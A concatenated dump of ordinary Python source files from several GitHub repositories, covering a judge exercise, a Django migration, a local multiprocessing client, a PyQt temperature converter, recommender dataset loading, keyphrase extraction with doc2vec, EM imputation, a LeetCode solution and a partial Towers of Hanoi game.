9b9ac8d68ee4e75b58e72cede9cacace96c23920 | 7c55a0d083ad0d26ebd21587b3c5d7512c3e527f | /1132.py | f34412ca23eb4222f8eeb8b36f05109f5f9bd855 | [] | no_license | gabriias/uri_solutions_python | 1f2a9f4391b18719112d9fa91c152310ec8138fe | cb24e7f9fbf746e68a247c7639e886bd36644b90 | refs/heads/master | 2022-03-09T18:33:58.029999 | 2022-02-26T02:29:20 | 2022-02-26T02:29:20 | 125,661,581 | 2 | 2 | null | 2019-10-05T15:15:38 | 2018-03-17T19:17:33 | Python | UTF-8 | Python | false | false | 145 | py | x, y = int(input()), int(input())
# Sum every integer in [x, y] that is not a multiple of 13.
# x and y are read from stdin above; they are swapped first so x <= y.
soma = 0
if x>y:
    x,y = y,x
for cont in range(x,y+1):
    if cont % 13 != 0:
        soma+=cont
print(soma)
| [
"gabrielamatias60@gmail.com"
] | gabrielamatias60@gmail.com |
564e7ae6d142c78bcd5de942b9a6a69facdfb9d0 | 8e0cdf235cd82e422c62fee3e6d044e4f4ee7614 | /feedback/migrations/0004_remove_translation.py | f0d087297b5ccce43ab6fa90c2ef41ed6fab4ac5 | [
"BSD-3-Clause"
] | permissive | stevecassidy/signbank-feedback | 4ae1c58a95a27428d11ef4a692c52738e9a4fb6f | d4cb8a7f445ca42c90a69d565d43875f50251aa8 | refs/heads/master | 2022-01-14T05:07:31.474605 | 2022-01-12T04:18:42 | 2022-01-12T04:18:42 | 78,930,468 | 1 | 1 | null | 2017-01-14T09:10:43 | 2017-01-14T09:10:43 | null | UTF-8 | Python | false | false | 407 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-17 13:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Schema migration: drop the ``translation`` field from SignFeedback."""
    # NOTE(review): the dependency name suggests 0003_map_translation migrated
    # the data out of `translation` before this removal — confirm.
    dependencies = [
        ('feedback', '0003_map_translation'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='signfeedback',
            name='translation',
        ),
    ]
| [
"steve.cassidy@mq.edu.au"
] | steve.cassidy@mq.edu.au |
d44cc064e0d441102cb7f749ba51da30194382e0 | 9808471fbc87c24439111d3e14f7d63dbd8231f1 | /Hacker/Mul_Client.py | d83f78dd16bd060d316bf9388b515607cf5686c0 | [] | no_license | sreekanthreddyv/CodeFiles | e2794f754394b256ce8efe4328bed673a8d909f8 | ce20ae55196bae21940ffd5dc9ab08256d091ae6 | refs/heads/master | 2020-11-26T11:23:11.445889 | 2020-01-15T07:09:21 | 2020-01-15T07:09:21 | 229,057,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from multiprocessing.connection import Client
from array import array
# Connect to a local multiprocessing listener on port 6000 (the matching
# server must use the same authkey) and print the first two messages.
address = ('localhost', 6000)
with Client(address, authkey=b'hacker') as conn:
    print(conn.recv())        # first message: a pickled Python object
    print(conn.recv_bytes())  # second message: a raw bytes payload
| [
"sreekanthreddy.v@live.com"
] | sreekanthreddy.v@live.com |
3b73a76ea650e307485d4229dbb14ddf636707d2 | 82916e7e06fd55a9326560de0aeb31e213a0172e | /ConversorTemCaFui.pyw | 782bf96c4e5768759d31e85897273f3997c1768b | [] | no_license | pazmanuelo/PyQt-Converterapp | 54e6f87669b9b3e345fa5999bebdfd0d625e21a5 | 18c08a4c2ccdf04167072b107bb7c0e93f3c8a98 | refs/heads/master | 2021-01-12T09:16:16.306407 | 2016-12-19T20:39:05 | 2016-12-19T20:39:05 | 76,812,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 957 | pyw | import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QLineEdit, QLabel, QPushButton, QGridLayout
from PyQt5 import uic
from PyQt5.QtGui import QFont
from PyQt5.QtCore import Qt
class Ventana(QMainWindow):
    """Main window of the temperature converter, loaded from a Qt Designer
    .ui file. The .ui file provides the widgets referenced below:
    `temp` (input field), `resultado` (output label) and the `CaF`/`FaC`
    buttons."""
    def __init__(self):
        QMainWindow.__init__(self)
        uic.loadUi("ConversorTemCaF.ui", self)
        self.setWindowTitle("Conversor de Temperatura")
        # Wire each conversion button to its handler.
        self.CaF.clicked.connect(self.BCaF)
        self.FaC.clicked.connect(self.BFaC)
    def BCaF(self):
        """Convert the entered value from Celsius to Fahrenheit."""
        temp = float(self.temp.text())
        conver = temp * 9 / 5 + 32
        self.resultado.setText(str(temp) + " ºC es igual a " + str(conver) + " ºF")
    def BFaC(self):
        """Convert the entered value from Fahrenheit to Celsius."""
        temp = float(self.temp.text())
        conver = (temp - 32) / 1.8
        self.resultado.setText(str(temp) + " ºF es igual a " + str(conver) + " ºC")
# Application bootstrap: create the Qt app, show the window, run the event loop.
app = QApplication(sys.argv)
_ventana = Ventana()
_ventana.show()
app.exec_()
| [
"noreply@github.com"
] | noreply@github.com |
f3413ede669ea92f934c279806562794428aa483 | f853f2ebabba72f4df8b6334e4f20d0517021440 | /rec_datasets.py | 6930f14e188a16717073fd9d576c7d5eadc447f7 | [] | no_license | gpapadop79/ml-recsys-thesis | 782e6bc6a6e0f486e20ae2c359bdfe12962c9c5c | 2d4da1e82ad757e9b915816c62f5e3a770713fee | refs/heads/master | 2021-05-24T01:24:26.851173 | 2020-12-17T09:24:55 | 2020-12-17T09:24:55 | 83,094,158 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,005 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 10 23:46:00 2016
@author: George
Reads a dataset by it's name
"""
import pandas as pd
import numpy as np
def load_dataset(data_path, dataset):
    """ Reads a dataset by name and returns it as a pandas DataFrame.

    data_path: root directory holding the dataset folders (joined with a
        backslash, so this code assumes Windows paths).
    dataset: one of the names handled below; each sets the relative file
        path, the field separator and whether the file has a header row.
    NOTE(review): an unknown dataset name leaves `folder` unbound and the
    read below raises NameError — confirm callers only pass known names.
    This is Python 2 code (bare `print` statement below).
    """
    if dataset == 'ml-100k':
        folder = r'ml-100k\u.data'
        separator = '\t'
        header = None
    elif dataset == 'ml-1M':
        # movielens 1M
        folder = r'ml-1m\ratings1.dat'
        separator = '::'
        header = None
    elif dataset == 'ml-10M':
        # movielens 10M
        folder = r'ml-10m\ratings.dat'
        separator = '::'
        header = None
    elif dataset == 'jester-1':
        # jester-1
        folder = r'jester\jester-1-ratings.txt'
        separator = '\t'
        header = None
    elif dataset == 'jester-4M':
        # jester-4M
        folder = r'jester\jester-full-ratings.txt'
        separator = '\t'
        header = None
    elif dataset == 'book-crossing':
        # book crossing
        folder = r'book-crossing\BX-Book-Ratings.csv'
        separator = ';'
        header = 0
    elif dataset == 'epinions':
        # epinions
        folder = r'epinions-rating\out.epinions-rating'
        separator = ' '
        header = 0
    elif dataset == 'amazon-ratings':
        # amazon ratings
        folder = r'amazon-ratings\out.amazon-ratings'
        separator = ' '
        header = 0
    elif dataset == 'eachmovie':
        # eachmovie
        folder = r'eachmoviedata\vote.txt'
        separator = '\t'
        header = None
    elif dataset == 'rec-eachmovie':
        # rec-eachmovie
        folder = r'rec-eachmovie\rec-eachmovie.edges'
        separator = ' '
        header = None
    elif dataset == 'netflix':
        # Netflix uses an absolute path on the author's machine, not data_path.
        # folder = r'netflix\netflix_mme.txt'
        folder = r'C:\Users\Vasso\Desktop\code.graphlab.datasets\netflix_mm.txt'
        # folder = r'D:\DATA\netflix_dataset\netflix_mm.txt'
        separator = ' '
        header = None
    elif dataset == 'hetrec2011-lastfm-2k':
        # hetrec2011 last.fm 2k
        folder = r'hetrec2011-lastfm-2k\user_artists.dat'
        separator = '\t'
        header = 0
    print 'Reading dataset ' + dataset
    if dataset == 'netflix':
        # Netflix file: skip the 3 header lines, keep user/item/rating columns
        # and force 32-bit ints to keep memory down.
        # data = pd.read_table(folder, sep=separator, header=header, skiprows=3)#, usecols=[0,1,3])
        data = pd.read_table(folder, sep=separator, header=header, usecols=[0,1,3], skiprows=3, #nrows=1000000,
                             names=['user', 'item', 'rating'],
                             dtype={'user': np.int32, 'item': np.int32, 'rating': np.int32})
    else:
        data = pd.read_table(data_path + '\\' + folder, sep=separator, header=header)
#        data = pd.read_table(data_path + '\\' + folder, sep=separator, header=header,
#                             names=['user', 'item', 'rating', 'timest'],
#                             dtype={'user': np.int16, 'item': np.int32, 'rating': np.int32})
#
    return data
| [
"gpapadop2012-git@yahoo.gr"
] | gpapadop2012-git@yahoo.gr |
d2046b818de8b7a3c2f53e781304184aa893fe05 | 8f3d0b74f335d3238d4cbbb8c78d7c8c1ce83351 | /data/process_doc2vec.py | 27e632c8a900ae63c4e94352bbfa3ea32b903a1a | [
"Apache-2.0"
] | permissive | LauJames/key_phrase_extract | 6255e444a5260f4e356cd2d733a4dfde3ce759a9 | 5c93353e5f0d7641ce9390f4621b1cedc20220c3 | refs/heads/master | 2020-04-26T22:01:53.834838 | 2019-03-30T11:30:08 | 2019-03-30T11:30:08 | 173,859,205 | 1 | 1 | Apache-2.0 | 2019-03-13T01:54:54 | 2019-03-05T02:38:36 | Python | UTF-8 | Python | false | false | 17,074 | py | #! /user/bin/evn python
# -*- coding:utf8 -*-
import os
import re
import numpy as np
from numpy import linalg
import time, datetime
import gensim
import gensim.models as g
from ir.config import Config
from ir.search import Search
from data import data_IO, evaluate
# Use Elasticsearch to fetch the top-n related documents for each abstract
# (these are the candidates used for the similarity computation).
def get_es_results(abstracts, top_n):
    """Query Elasticsearch once per abstract and collect the raw result lists.

    abstracts: iterable of abstract strings used as search keys.
    top_n: number of related documents requested per abstract.
    Returns a list with one ES result list per successfully searched
    abstract; failed searches are logged and skipped. Total elapsed time
    is printed at the end.
    """
    start_time = time.time()
    es_results = []
    config = Config()
    search = Search()
    for abstract in abstracts:
        try:
            result = search.search_by_abstract(abstract, top_n, config)
            print(result)
            print('搜索结果中包含 ' + str(len(result)) + ' 条数据')
            es_results.append(result)
        except (Exception) as e:
            print('ES检索出现异常: Exception:', str(e))
    end_time = time.time()
    time_used = datetime.timedelta(seconds= int (round(end_time - start_time)))
    print('检索耗时:' + str(time_used))
    return es_results
# Compute the similarity between one document and every document in the ES
# result set, sorted in descending order of similarity, e.g.:
# [(1,1),(2,0.8),(3,0.5)...],[(1,0.6),(2,1),(3,0.5)...]
def calculate_doc_sim(doc_vectors):
    """Cosine similarity of the first document vector against every vector
    (itself included), returned as (index, similarity) pairs sorted by
    similarity, descending."""
    target = doc_vectors[0]
    sims = {}
    for idx in range(len(doc_vectors)):
        other = doc_vectors[idx]
        numerator = np.dot(target, other)
        denominator = linalg.norm(target) * linalg.norm(other)
        sims[idx] = numerator / denominator
    # sorted() is stable, so equal similarities keep their index order.
    return sorted(sims.items(), key=lambda kv: kv[1], reverse=True)
# For one document: fuse all key phrases of its topN most similar external documents.
def get_external(topN_doc_sims, keywords, currunt_docID):
    """Aggregate key phrases from the documents similar to the current one.

    topN_doc_sims: (doc_id, similarity) pairs for one document's topN
        similar documents within the ES result set.
    keywords: author keywords of every ES result document, indexed by id.
    currunt_docID: id of the target document, which is skipped.

    Each phrase's weight is the sum of the similarities of the documents
    that contain it.
    """
    sims_per_key = {}  # phrase -> list of similarities of docs containing it
    for doc_id, sim in topN_doc_sims:
        if doc_id == currunt_docID:
            continue  # never let the target document vote for itself
        for key in keywords[doc_id]:
            sims_per_key.setdefault(key, []).append(sim)
    # Fuse each phrase's evidence into a single weight (sum; the mean
    # variant was dropped upstream).
    return {key: np.sum(np.array(sims)) for key, sims in sims_per_key.items()}
# For one document: fuse all key phrases of its topN most similar external documents.
def get_external_doc2vec(topN_doc_sims, keywords, currunt_docID):
    """Aggregate key phrases from similar documents, doc2vec variant.

    topN_doc_sims: (tag, similarity) pairs as returned by
        gensim most_similar(); unlike get_external, documents are matched
        POSITIONALLY — both the currunt_docID comparison and the keywords
        lookup use the list index, not the tag.
    Each phrase's weight is the sum of the similarities of the documents
    that contain it.
    """
    sims_per_key = {}  # phrase -> similarities of the docs containing it
    for pos, pair in enumerate(topN_doc_sims):
        if pos == currunt_docID:
            continue  # skip the target document itself
        sim = pair[1]
        for key in keywords[pos]:
            sims_per_key.setdefault(key, []).append(sim)
    # Sum each phrase's similarity evidence into one weight.
    return {key: np.sum(np.array(sims)) for key, sims in sims_per_key.items()}
# For one document: merge internal and external key phrases.
# The target document's own phrases get weight p, external phrases 1 - p.
def merge(original_dict, external_dict, p):
    """Blend the document's own phrase weights with external ones.

    Phrases in both dicts get p*own + (1-p)*external; phrases only in the
    original get p*own; phrases only in the external dict get
    (1-p)*external.
    """
    merged = {}
    for key, own_weight in original_dict.items():
        if key in external_dict:
            # present on both sides: weighted combination
            merged[key] = p * own_weight + (1 - p) * external_dict[key]
        else:
            # only the original document has it
            merged[key] = p * own_weight
    for key, ext_weight in external_dict.items():
        if key not in merged:
            # only the external documents have it
            merged[key] = (1 - p) * ext_weight
    return merged
# For a single document:
# def extract_es(es_result, vector_model, vocab, topN, p):
#     print('提取当前文档的关键词:')
#     start_time = time.time()
#     all_merged_kp = []
# For all documents:
def extract_all_es(es_results, vector_model, vocab, topN, p):
    """Extract merged key phrases for every document using ES similarity.

    es_results: one ES result list per target document; within each list
        the target document itself is entry 0, and each entry is a tuple
        whose fields [1], [2], [3] hold abstract text, ';'-joined author
        keywords and the RAKE extraction string ('weight|||phrase'
        records joined by '###') — presumably; confirm against the ES
        schema.
    vector_model / vocab: word-vector model and its vocabulary (words not
        in vocab are mapped to 'unknown').
    topN: number of similar documents fused per target document.
    p: weight of the document's own (RAKE) phrases in the final merge.
    Returns one merged {phrase: weight} dict per successfully parsed
    document; documents with malformed RAKE data are skipped.
    """
    print('extract_all_es:...')
    start_time = time.time()
    all_merged_kp = []
    # For each document:
    for es_result in es_results:
        # es_result contains the target document's own data at index 0.
        is_error = False
        # Grab the current document's RAKE extraction result.
        rake_extract = es_result[0][3] # the target document is the first ES hit
        # Parse the target document's rake_extract into {phrase: weight}.
        rake_extract_dict = {}
        extracs_tmp = rake_extract.split('###')
        for m in range(len(extracs_tmp)):
            extracs_phrase_weight = extracs_tmp[m].split('|||')
            try:
                rake_extract_dict.update({extracs_phrase_weight[1]: float(extracs_phrase_weight[0])})
            except (Exception) as e:
                print('Exception:', str(e))
                print('该行提取的关键术语数据有误:' + str(rake_extract))
                print('具体数据错误:' + str(extracs_phrase_weight))
                is_error = True
                # NOTE(review): rebinding the loop variable does not break out
                # of a range() loop — parsing continues; presumably an early
                # exit was intended.
                m = len(extracs_tmp) + 1
                continue
        if not is_error:
            abstracts = []
            keywords = []
            for data in es_result:
                # Tokenize the abstract of each ES result document, replacing
                # every character outside the whitelist with a space.
                abs_split = re.sub(r'[^\u4e00-\u9fa5a-zA-Z0-9~!@#$%^&*()_+<>?:,./;’,。、‘:“《》?~!@#¥%……()]', ' ', data[1]).split(' ')
                for j in range(len(abs_split)):
                    if not vocab.__contains__(abs_split[j]):
                        abs_split[j] = 'unknown'
                abstracts.append(abs_split)
                # Collect the result document's original author keywords.
                keywords.append(data[2].split(';'))
            doc_vectors = data_IO.doc2vec(vector_model, abstracts)
            doc_sims = calculate_doc_sim(doc_vectors)
            # Keep the topN most similar documents by vector similarity.
            topN_doc_sims = doc_sims[:topN + 1] # +1 because the list includes the target itself
            external_dict = get_external(topN_doc_sims, keywords, currunt_docID=0)
            # Normalize both weight dicts before merging.
            external_dict = data_IO.normalization(external_dict)
            rake_extract_dict = data_IO.normalization(rake_extract_dict)
            one_merge_dict = merge(rake_extract_dict, external_dict, p)
            all_merged_kp.append(one_merge_dict)
    end_time = time.time()
    time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
    print('耗时: ', str(time_used))
    return all_merged_kp
# Compute the rake_dict and external_dict for every document.
def get_all_merge_info(es_results, vector_model, vocab, topN):
    """Compute, per document, the normalized (external_dict, rake_dict) pair.

    Same pipeline as extract_all_es up to (but excluding) the final merge,
    so different values of the merge weight p can be tried later without
    redoing the expensive similarity computation. Returns a list of
    [external_dict, rake_extract_dict] pairs; malformed documents are
    skipped.
    """
    print('get_all_merge_info:...')
    start_time = time.time()
    all_merged_info= []
    # For each document:
    for es_result in es_results:
        # es_result contains the target document's own data at index 0.
        is_error = False
        # Grab the current document's RAKE extraction result.
        rake_extract = es_result[0][3] # the target document is the first ES hit
        # Parse the target document's rake_extract into {phrase: weight}.
        rake_extract_dict = {}
        extracs_tmp = rake_extract.split('###')
        for m in range(len(extracs_tmp)):
            extracs_phrase_weight = extracs_tmp[m].split('|||')
            try:
                rake_extract_dict.update({extracs_phrase_weight[1]: float(extracs_phrase_weight[0])})
            except (Exception) as e:
                print('Exception:', str(e))
                print('该行提取的关键术语数据有误:' + str(rake_extract))
                print('具体数据错误:' + str(extracs_phrase_weight))
                is_error = True
                # NOTE(review): rebinding the loop variable does not break out
                # of a range() loop — parsing continues.
                m = len(extracs_tmp) + 1
                continue
        if not is_error:
            abstracts = []
            keywords = []
            for data in es_result:
                # Tokenize the abstract of each ES result document, replacing
                # every character outside the whitelist with a space.
                abs_split = re.sub(r'[^\u4e00-\u9fa5a-zA-Z0-9~!@#$%^&*()_+<>?:,./;’,。、‘:“《》?~!@#¥%……()]', ' ', data[1]).split(' ')
                for j in range(len(abs_split)):
                    if not vocab.__contains__(abs_split[j]):
                        abs_split[j] = 'unknown'
                abstracts.append(abs_split)
                # Collect the result document's original author keywords.
                keywords.append(data[2].split(';'))
            doc_vectors = data_IO.doc2vec(vector_model, abstracts)
            doc_sims = calculate_doc_sim(doc_vectors)
            # Keep the topN most similar documents by vector similarity.
            topN_doc_sims = doc_sims[:topN + 1] # +1 because the list includes the target itself
            external_dict = get_external(topN_doc_sims, keywords, currunt_docID=0)
            # Normalize both weight dicts; merging happens later.
            external_dict = data_IO.normalization(external_dict)
            rake_extract_dict = data_IO.normalization(rake_extract_dict)
            all_merged_info.append([external_dict, rake_extract_dict])
    end_time = time.time()
    time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
    print('get_all_merge_info()耗时: ', str(time_used))
    return all_merged_info
def get_all_merge_info_doc2vec(ids, all_keywords,all_rake_dict, doc2vec_model, topN):
    """Per-document (external_dict, rake_dict) pairs, doc2vec variant.

    Instead of re-vectorizing ES results, similar documents are retrieved
    from the trained gensim Doc2Vec model over the full corpus.

    ids: document tags to process.
    all_keywords: author keywords per document, indexed by tag.
    all_rake_dict: RAKE {phrase: weight} dict per document, indexed by tag.
    topN: number of similar documents retrieved per target document.
    Returns a list of [external_dict, rake_extract_dict] pairs.
    """
    print('get_all_merge_info_doc2vec:...')
    start_time = time.time()
    all_merged_info = []
    # For each document:
    for doc_id in ids:
        # Look up the document's vector in the gensim doc-vector model.
        doc_vector = doc2vec_model.docvecs[doc_id]
        topN_doc_sims = doc2vec_model.docvecs.most_similar([doc_vector], topn=topN) # similar docs drawn from the whole model corpus
        keywords = []
        for id_sim in topN_doc_sims:
            id = id_sim[0]
            keywords.append(all_keywords[id])
        external_dict = get_external_doc2vec(topN_doc_sims, keywords, currunt_docID=0)
        # Normalize both weight dicts; merging happens later.
        external_dict = data_IO.normalization(external_dict)
        rake_extract_dict = data_IO.normalization(all_rake_dict[doc_id]) # this document's RAKE result
        all_merged_info.append([external_dict, rake_extract_dict])
        print('第' + str(doc_id) + ' 个文档merge信息提取完毕')
    end_time = time.time()
    time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
    print('get_all_merge_info()耗时: ', str(time_used))
    return all_merged_info
# Merge internal and external key phrases based on each document's
# RAKE-extracted phrases and the keywords of its similar documents.
def extract_all(all_merged_info, p):
    """Fuse internal (RAKE) and external key-phrase weights for every document.

    all_merged_info holds [external_dict, rake_extract_dict] pairs; each
    pair is merged with weight p on the document's own phrases and 1 - p
    on the external ones. Prints the elapsed time.
    """
    t_begin = time.time()
    all_merged_kp = [
        merge(rake_dict, ext_dict, p)
        for ext_dict, rake_dict in all_merged_info
    ]
    time_used = datetime.timedelta(seconds=int(round(time.time() - t_begin)))
    print('extract_all()耗时: ', str(time_used))
    return all_merged_kp
# Entry point: load the doc2vec model and corpus data, build per-document
# merge info once, then sweep merge weight p and cutoff k, writing
# precision/recall/F evaluations under evaluate_dir.
if __name__ == '__main__':
    doc2vec_dir = '../doc2vec/model.bin'
    vector_dir = 'sg.word2vec.300d'
    file_path = 'doc_test.txt'
    file_path_json = 'rake_extract_keyphrase.json'
    vocab_dir = 'vocab_sg300d.txt'
    merged_results_dir = 'all_merged_results.txt'
    es_dir = 'process_es_search.txt'
    # evaluate dir:
    evaluate_dir = '../evaluate_es_10w_doc2vec2/'
    topK_merged_dir = 'topK_merged_results.txt'
    # precision_dir = 'precision.txt'
    # recall_dir = 'recall.txt'
    # avg_dir = 'avg.txt'
    data_num = 100000
    topN = 10 # 10 similar documents per target
    p_list = [0, 0.2, 0.5, 0.6, 0.8]
    k_list = [2, 4, 6, 8, 10, 12]
    # p_list = [0.2]
    # k_list = [2]
    stop_words = data_IO.get_stopword()
    # print('加载词向量模型...')
    # word2vec_model = gensim.models.KeyedVectors.load_word2vec_format(fname=vector_dir, binary=False)
    # print('词向量模型加载完毕!')
    print('加载文档向量模型...')
    doc2vec_model = g.Doc2Vec.load(doc2vec_dir)
    print('文档向量模型加载完毕!')
    # prepare for data
    vocab = data_IO.load_vocab(vocab_dir)
    ids, _, all_doc_keywords,all_rake_dict = data_IO.load_all_data_json4(file_path_json) # full dataset
    print('abstract_str_list.len: ' + str(len(all_doc_keywords)))
    # all_merged_info = data_IO.load_all_temp_info('../merge_info/10w_merge_info.txt')
    # print('merged_info加载完毕!')
    # Only the first 100k documents are processed in this run.
    all_merged_info = get_all_merge_info_doc2vec(ids[0:100000], all_doc_keywords, all_rake_dict[0:100000],
                                                 doc2vec_model,10)
    # all_merged_info = get_all_merge_info_doc2vec(ids, all_doc_keywords, all_rake_dict, doc2vec_model, 10)
    # data_IO.save_es_search_results(all_merged_info, '../merge_info/57w_merge_info.txt')
    # print(all_merged_info)
    print('计算merge需要的信息完毕!')
    # merge:
    start_time = time.time()
    avg_evaluate = {}
    for p in p_list:
        print('概率p为 ' + str(p) + ' 的结果:')
        if not os.path.exists(evaluate_dir):
            os.makedirs(evaluate_dir)
        p_evaluate_dir = os.path.join(evaluate_dir, 'P' + str(p) + '/')
        if not os.path.exists(p_evaluate_dir):
            os.makedirs(p_evaluate_dir)
        # Fuse internal and external key phrases using weight p.
        all_merged_kp = extract_all(all_merged_info, p)
        all_merged_dir = os.path.join(p_evaluate_dir, 'all_merged.txt')
        evaluate.save_all_merged_results(all_merged_kp, all_merged_dir)
        k_avg_evaluate = []
        for k in k_list:
            print('取前 ' + str(k) + ' 个关键术语的结果:')
            # per-k output folder
            p_k_evaluate_dir = os.path.join(p_evaluate_dir, 'top' + str(k) + '/')
            if not os.path.exists(p_k_evaluate_dir):
                os.makedirs(p_k_evaluate_dir)
            # take the top-K key phrases:
            topK_merged_kp = evaluate.get_topK_kp(all_merged_kp, k)
            p_k_merged_results_dir = os.path.join(p_k_evaluate_dir, 'top' + str(k) + '_phrases.txt')
            evaluate.save_results(topK_merged_kp, p_k_merged_results_dir)
            # evaluate: results are stemmed before scoring
            precision_avg, recall_avg, f, precision, recall = evaluate.evaluate_stem(topK_merged_kp, all_doc_keywords,
                                                                                    stop_words)
            precision_dir = os.path.join(p_k_evaluate_dir, 'precision_' + str(k) + '.txt')
            recall_dir = os.path.join(p_k_evaluate_dir, 'recall_' + str(k) + '.txt')
            evaluate.save_results(precision, precision_dir)
            evaluate.save_results(recall, recall_dir)
            k_avg_evaluate.append({k: [precision_avg, recall_avg, f]})
            print('平均检准率: ', precision_avg)
            print('平均检全率: ', recall_avg)
            print('F值: ', f)
            print('\n')
        avg_evaluate.update({p: k_avg_evaluate})
    avg_dir = os.path.join(evaluate_dir, 'evaluate_avg_doc2vec.txt')
    print(avg_dir)
    # Persist the averaged metrics, one line per p value.
    with open(avg_dir, mode='w', encoding='utf-8')as wp:
        for i in avg_evaluate:
            wp.write('p='+str(i) + ': ' + str(avg_evaluate.get(i)) + '\n')
    print('评估结果存储完毕!')
    end_time = time.time()
    time_used = datetime.timedelta(seconds=int(round(end_time - start_time)))
    print('评估总体耗时: ', str(time_used))
"LauJames_work@163.com"
] | LauJames_work@163.com |
d70ef292f9b8407850d0be8b2861610269e132d6 | 0de17c84dec8448d9063ed45b36bb16c4702b499 | /impyute/imputation/cs/em.py | 184962a31d0e9efd0d5644cfc1608fde5cfa1ae2 | [] | no_license | aureole222/Auto_ML | 1732b51ec9a8b93085747dbba3ae74d5886b9c1e | 427c1e97168d5978aeeb559fe050efba499fc3e3 | refs/heads/master | 2022-12-01T04:18:14.176425 | 2020-08-14T01:31:19 | 2020-08-14T01:31:19 | 283,636,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | import numpy as np
from impyute.ops import matrix
from impyute.ops import wrapper
@wrapper.wrappers
@wrapper.checks
def em(data, loops=50):
    """ Imputes given data using expectation maximization.

    E-step: Calculates the expected complete data log likelihood ratio.
    M-step: Finds the parameters that maximize the log likelihood of the
    complete data.

    Parameters
    ----------
    data: numpy.nd.array
        Data to impute (modified in place; also returned).
    loops: int
        Number of em iterations to run before breaking.

    Returns
    -------
    numpy.nd.array
        Imputed data.
    """
    nan_xy = matrix.nan_indices(data)
    # First pass: seed every missing cell with a draw from N(mean, std)
    # of the observed values in its column.
    for x_i, y_i in nan_xy:
        col = data[:, int(y_i)]
        mu = col[~np.isnan(col)].mean()
        std = col[~np.isnan(col)].std()
        col[x_i] = np.random.normal(loc=mu, scale=std)
    # NOTE(review): this refinement loop sits OUTSIDE the loop above, so
    # `col`, `x_i` and `y_i` still refer only to the LAST missing cell —
    # presumably every cell was meant to be refined; confirm against
    # upstream impyute.
    previous, i = 1, 1
    for i in range(loops):
        # Expectation
        mu = col[~np.isnan(col)].mean()
        std = col[~np.isnan(col)].std()
        # Maximization
        col[x_i] = np.random.normal(loc=mu, scale=std)
        # Break out of loop if likelihood doesn't change at least 10%
        # and has run at least 5 times
        delta = (col[x_i]-previous)/previous
        if i > 5 and delta < 0.1:
            data[x_i][y_i] = col[x_i]
            break
        data[x_i][y_i] = col[x_i]
        previous = col[x_i]
    return data
| [
"xiaruizhe@Xias-iMac.local"
] | xiaruizhe@Xias-iMac.local |
56984e71ca46bff6d41242ea2239873e9f30a22c | 3369b534949fc10edbc956de5514424e2d225438 | /KR-WordRank-master/krwordrank/graph/__init__.py | 492ec1a6696ef383c6e6cc27211dc7dbb3b970bc | [] | no_license | huo223gg/mynote | d7db940d70163cadb84f9eca3652e1fab0c8bf96 | 7d6800ad582951e6f0cac9f42b1fa58e378c8823 | refs/heads/master | 2020-05-20T18:26:28.466468 | 2019-05-09T02:09:46 | 2019-05-09T02:09:46 | 185,706,744 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | from ._rank import hits | [
"44153293+huo223gg@users.noreply.github.com"
] | 44153293+huo223gg@users.noreply.github.com |
69cc105ffb1b88b37b4962ce32f29a3d2366625d | 1af1f89eb9a178b95d1ba023b209b7538fb151f0 | /Algorithms/498. Diagonal Traverse.py | a78694dcbb277726c2c4bc88dabf90747eadcb45 | [] | no_license | 0xtinyuk/LeetCode | 77d690161cc52738e63a4c4b6595a6012fa5c21e | 08bc96a0fc2b672282cda348c833c02218c356f1 | refs/heads/master | 2023-02-21T16:58:39.881908 | 2021-01-25T08:00:13 | 2021-01-25T08:00:13 | 292,037,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | class Solution:
def findDiagonalOrder(self, matrix: List[List[int]]) -> List[int]:
sx = 0
sy = 0
m = len(matrix)
if m==0:
return []
n = len(matrix[0])
if n==0:
return []
ans = []
reverse = False
while sx<m and sy<n:
x=sx
y=sy
temp = []
while x>=0 and y<n:
temp.append(matrix[x][y])
x-=1
y+=1
if reverse:
temp.reverse()
reverse = not reverse
ans = ans + temp
if (sx==m-1):
sy+=1
else:
sx+=1
return ans | [
"xliu301@uottawa.ca"
] | xliu301@uottawa.ca |
70730442f0974d53e608141b631786d816b8d1a1 | a49aa485318e499950130a6f9bf2c565dc4ccdf3 | /script.py | d2a8c07172bacd443603463a3f6ce0682ebcc60e | [] | no_license | NguyenThanhDat-GitHub/Tower_Of_Hanoi | 886b1721db887533054ec00fbf15b43530f14895 | eda64ac99b1f1e86677c533b81bd5c47d14f5715 | refs/heads/master | 2022-12-28T23:35:10.687522 | 2020-10-14T04:07:50 | 2020-10-14T04:07:50 | 303,898,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | from stack import Stack
print("\nLet's play Towers of Hanoi!!")
#Create the Stacks
stacks = []
left_stack = Stack("Left")
middle_stack = Stack("Middle")
right_stack = Stack("Right")
stacks.append(left_stack)
stacks.append(middle_stack)
stacks.append(right_stack)
#Set up the Game
num_disks = int(input("\nHow many disks do you want to play with?\n"))
while num_disks < 3:
num_disks = int(input("Enter a number greater than or equal to 3\n"))
for i in range(num_disks, 0, -1):
left_stack.push(i)
num_optimal_moves = 2 ** num_disks - 1
print("\nThe fastest you can solve this game is in {0} moves".format(num_optimal_moves))
#Get User Input
def get_input():
choices = [stack.get_name()[0] for stack in stacks]
while True:
for i in range(len(stacks)):
name = stacks[i].get_name()
letter = choices[i]
print("Enter {0} for {1}".format(letter, name))
user_input = input("")
if user_input in choices:
for i in range(len(stacks)):
if user_input == choices[i]:
return stacks[i]
#Play the Game
num_user_moves = 0
while right_stack.get_size() != num_disks:
print("\n\n\n...Current Stacks...")
for stack in stacks:
stack.print_items()
while True:
print("\nWhich stack do you want to move from?\n")
from_stack = get_input()
print("\nWhich stack do you want to move to?\n")
to_stack = get_input()
if from_stack.is_empty():
print("\n\nInvalid Move.Try Again")
